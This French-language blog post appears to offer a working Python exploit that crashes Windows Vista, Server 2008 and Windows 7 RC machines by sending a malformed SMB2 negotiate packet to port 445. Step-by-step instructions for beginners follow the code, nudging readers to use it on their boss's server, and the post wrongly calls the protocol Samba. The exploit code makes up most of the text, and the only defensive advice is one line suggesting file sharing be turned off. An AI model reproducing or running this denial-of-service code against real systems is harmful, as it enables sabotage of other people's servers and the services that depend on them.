Faire planter un serveur dans une entreprise... Trop simple !

Je viens de tester cette méthode sur un de mes serveurs, sous Windows Server 2008 :

#!/usr/bin/python
#When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field
#it dies with a PAGE_FAULT_IN_NONPAGED_AREA error

from socket import socket
from time import sleep

host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()


Voilà un petit but de code en Python. Vous voulez faire planter un serveur ?
Copiez ce code dans votre bloc note, modifier "IP_ADD" par l'adresse IP du serveur à faire sauter, sauvegardez le tout sous "planter_le_serveur_du_boss.py".
Téléchargez le runtime Python à cette adresse.

Double-cliquez sur le fichier créé... Et vous obtiendrez un bel écran bleu sur le serveur!

Ce petit script marche avec Windows Vista et Server 2008, mais également sous Windows Seven RC. La version finale de Seven est protégée en revanche.

Vous voulez connaitre le comble de l'histoire? Cette faille de sécurité est liée à un patch de sécurité précédent de Windows! Magnifique...

Cette faille concerne le protocole de partage de fichiers de Windows, le protocole Samba. Le seul moyen de se protéger de  cette faille pour le moment est de désactiver le partage de fichiers. C'est bien mais ça reste gênant sur un serveur sensé servir de serveur de fichiers!